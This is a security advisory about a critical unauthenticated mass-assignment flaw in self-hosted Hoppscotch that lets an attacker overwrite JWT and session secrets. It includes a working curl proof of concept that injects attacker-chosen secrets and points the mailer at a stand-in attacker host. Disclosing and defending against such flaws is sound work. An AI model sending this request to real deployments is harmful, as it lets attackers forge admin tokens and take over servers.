Hello,

We are reporting a critical vulnerability in Hoppscotch, an open source
self-hosted API development platform (79,000+ GitHub stars).

CVE:      CVE-2026-50160
CVSS:     10.0 (Critical)
GHSA:
https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf
Affected: Hoppscotch self-hosted <= 2026.4.1
Fixed:    2026.5.0

Summary:

The POST /v1/onboarding/config endpoint allows an unauthenticated attacker
to inject arbitrary InfraConfig keys including JWT_SECRET and
SESSION_SECRET
into the database via mass assignment. Four independent weaknesses combine
to enable this:

1. NestJS ValidationPipe missing whitelist:true - extra request body
   properties are not stripped
2. Object.entries(dto) iterates all properties without runtime validation
3. validateEnvValues has default:break - JWT_SECRET passes silently
4. No authentication on the onboarding endpoint

An attacker controlling JWT_SECRET can forge tokens for any user including
admin, resulting in full server compromise. The attack works on any fresh
Hoppscotch deployment before onboarding completes, or when re-onboarding is
enabled.

Proof of concept:

curl -X POST http://target:3170/v1/onboarding/config \
  -H "Content-Type: application/json" \
  -d '{
    "VITE_ALLOWED_AUTH_PROVIDERS": "EMAIL",
    "MAILER_SMTP_ENABLE": "true",
    "MAILER_SMTP_URL": "smtp://attacker.com:25",
    "MAILER_ADDRESS_FROM": "[email protected]",
    "JWT_SECRET": "ATTACKER_CONTROLLED_JWT_SECRET",
    "SESSION_SECRET": "ATTACKER_CONTROLLED_SESSION"
  }'

Fix:

Upgrade to Hoppscotch 2026.5.0. Full fix details and root cause analysis
in the advisory linked above.

Full writeup: https://www.offgridsec.com/blog-hoppscotch-cve-2026-50160.html

Reported by: Offgrid Security (https://offgridsec.com)
Found by:    Kira, model-agnostic autonomous AI security agent

Reply via email to